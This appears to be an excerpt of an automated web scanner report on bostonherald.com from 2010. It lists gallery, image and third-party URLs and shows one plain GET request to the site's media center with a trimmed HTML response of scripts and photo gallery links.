http://gallery.pictopia.com/bostonherald/gallery/Sports/Patriots%2023,%20Chargers%2020
http://gallery.pictopia.com/bostonherald/gallery/Sports/Patriots%2028,%20Vikings%2018
http://gallery.pictopia.com/bostonherald/gallery/Sports/Patriots%2041,%20Dolphin%2014
http://gallery.pictopia.com/bostonherald/gallery/Sports/Pats%20build%20playground
http://gallery.pictopia.com/bostonherald/gallery/Sports/Ray%20Allen%20plays%20`Knockout'
http://gallery.pictopia.com/bostonherald/gallery/Track/Celebs%20at%20the%20Garden%20for%20the%20Celtics-Heat%20game
http://gallery.pictopia.com/bostonherald/gallery/Track/Shaq%20strikes%20a%20pose%20in%20Harvard%20Square
http://gallery.pictopia.com/bostonherald/photo/?photo_name=17ad46_110610cahillfn03
http://multimedia.heraldinteractive.com/images/20101107/17ad46_110610cahillfn03.JPG
http://multimedia.heraldinteractive.com/images/20101108/cb73f7_lisam11082010.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/717bd4_100310redsoxkm27.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/7cbd67_100310blesstf04.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/d72784_100210bcfootballjw08.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101004/stp/cabf78_Dempsey_Challenge__trose@heraldinteractive.com_3.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101004/stp/ff40b7_100110theT02.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/6a578c_100510celtsar05.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/a8f666_100410patriotsmw43.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/b88457_100510simbams06.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101006/stp/1d7629_100610funeraltf01.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101006/stp/aa92d8_pold.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/46aee4_100610hous04.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/761cae_100710shootingmg01.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/d2c5b9_100610celticsms01.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/2d0b15_100910lauf12.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/a40909_100710schoolbusmg01.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/d450af_100710patsjw19.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/21a47b_100910harvardjw07.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/6012d0_100910battletf19.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/840cf0_100910honkce012.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/ac1815_100810patsjw12.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/f9305f_100910bakermh01.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101011/stp/9802b5_101010paradenl07.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101011/stp/f691f9_101010celticsmw14.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/4b050f_101010paradenl16.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/b78c53_Premiere_Hereafter_NY__trose@heraldinteractive.com_7.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/ff8eaf_101110celticstf14.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101013/stp/aaa6c0_101210patsnl17.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/2787ca_101310bruinspw011.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/795c9a_101310patriotstf03.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/da48ca_101310chambertf05.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/06df0b_101410patriotsmw13.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/367211_101510footballce004.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/837ea6_101510debatepw014.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101016/stp/9cc789_100810patsjw03.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101016/stp/b64c00_101610campaignmg04.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/0d59ee_101710pats18.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/4a45aa_101710rowersnl09.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/87b93c_101410shattuck06.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/a3c123_101710graffiti05.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101019/stp/0fcd65_Face_Transplant__trose@heraldinteractive.com_2.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101019/stp/14c5ba_101810shootce007.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101019/stp/48999a_101810bruinstf05.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/4ad8be_101810tiffanytf04.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/8d568a_101910celticsmw13.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/aa4488_21ghos4.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/cdecf9_101910lightbulbap01.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/fa4a70_101410sturmtf11.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101021/stp/62874a_102010celticsms16.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101021/stp/c30001_73072_1533486631381_1661255220_1332182_5774520_n.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101022/stp/4c1d99_102110bruinsms16.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/460e46_102210footballce017.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/4a049f_102310bcfootballjw21.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/7ccf23_102310rowce013.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/9174e7_102310bakerfn03.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101024/stp/58f01a_102310devalfn01.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101024/stp/a0d32d_102410regattamw006.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101024/stp/d615fe_102410patsms002.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101025/stp/3b784d_102510allennl05.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101025/stp/dd2552_102510golfmh03.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/0ce3ae_102610patsplaygroundjw08.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/192b5f_2010102720101027209632.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/ef4f2e_102610golftf10.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/fbfcb4_102610celticsmw30.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101028/stp/f5cd39_102710patstf04.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101029/stp/246efe_102810patriotsmw03.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101029/stp/6bc6f8_102810bruinsms11.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101029/stp/708e7d_102910henryce007.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/3f8e6e_103010keatingkm20.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/41db8f_103010bakertf04.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/a96d05_103010bcfootballjw04.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/e8607f_102910celticssc02.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101031/stp/641d55_103110pats21.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/14312b_103110Patrick02jm.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/14ed81_110410shaq01.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/8193a3_103110florencekm08.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/191160_110110bakertf07.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/5d2015_110210bakernl04.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/a51bdb_110210stabmg04.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101103/stp/9ba709_110310explomg02.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101104/stp/033e68_110310curtistf05.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101104/stp/ffdc04_110310celticsms19.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101105/stp/016900_Graf1_11052010.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/25c56a_110210cahilltf07.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/53f1ab_110510celticssc12.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/ad899b_110710patsms12.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/c6e345_110610bruinsjw26.JPG
http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/d23c70_110610weddingmg02.JPG
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:26:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>

                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=445" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<link rel="alternate" title="Photos & Video - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/mediacenter/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fmediacenter%2Findex.php%3Fmedia_type_photo%3D0%26media_type_video%3D1%26media_type_audio%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://buyheraldphotos.com">Buy Herald Photos</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
ideo" name="media_type_video" value="1" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.png" style="position:relative; top: 4px;" /> Video

 

   <!--
<input type="submit" class="mediaTypeBtn " name="media_type" value="Audio" onclick="if($('media_type_audio').
...[SNIP]...
id="media_type_photo" name="media_type_photo" value="0" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPhoto.png" style="position:relative; top: 4px;" /> Photo

 

</div>
...[SNIP]...
<div id="navPaneOverlay" ><img class="ajax_loader" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader-big-blackBg.gif" /></div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay0" class="nowPlayingOverlay" width="40" style=" display: block; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay1" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay2" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay3" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay4" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay5" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay6" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay7" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay8" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay9" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay10" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay11" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay12" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay13" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay14" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay15" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay16" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay17" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay18" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay19" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay20" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay21" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4516','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/d23c70_110610weddingmg02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Thief makes escape in wedding limo"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Thief makes escape in wedding limo">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4514','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/25c56a_110210cahilltf07.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 Mass. election"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 Mass. election">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4511','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101105/stp/016900_Graf1_11052010.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4502','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101104/stp/033e68_110310curtistf05.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4500','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101103/stp/9ba709_110310explomg02.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\House explodes in Hyde Park"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\House explodes in Hyde Park">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4498','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/a51bdb_110210stabmg04.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4497','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/5d2015_110210bakernl04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\The candidates vote on election morning"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\The candidates vote on election morning">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4496','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101102/stp/191160_110110bakertf07.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Candidates prepare for Election Day"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Candidates prepare for Election Day">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4493','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101101/stp/14312b_103110Patrick02jm.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Last days on the campaign trail"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Last days on the campaign trail">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4491','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/41db8f_103010bakertf04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov candidates around town"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov candidates around town">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4489','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/3f8e6e_103010keatingkm20.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Keating rallies support"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Keating rallies support">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4485','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101029/stp/708e7d_102910henryce007.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4471','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101024/stp/58f01a_102310devalfn01.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov. race"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gov. race">Purchase</a>
...[SNIP]...
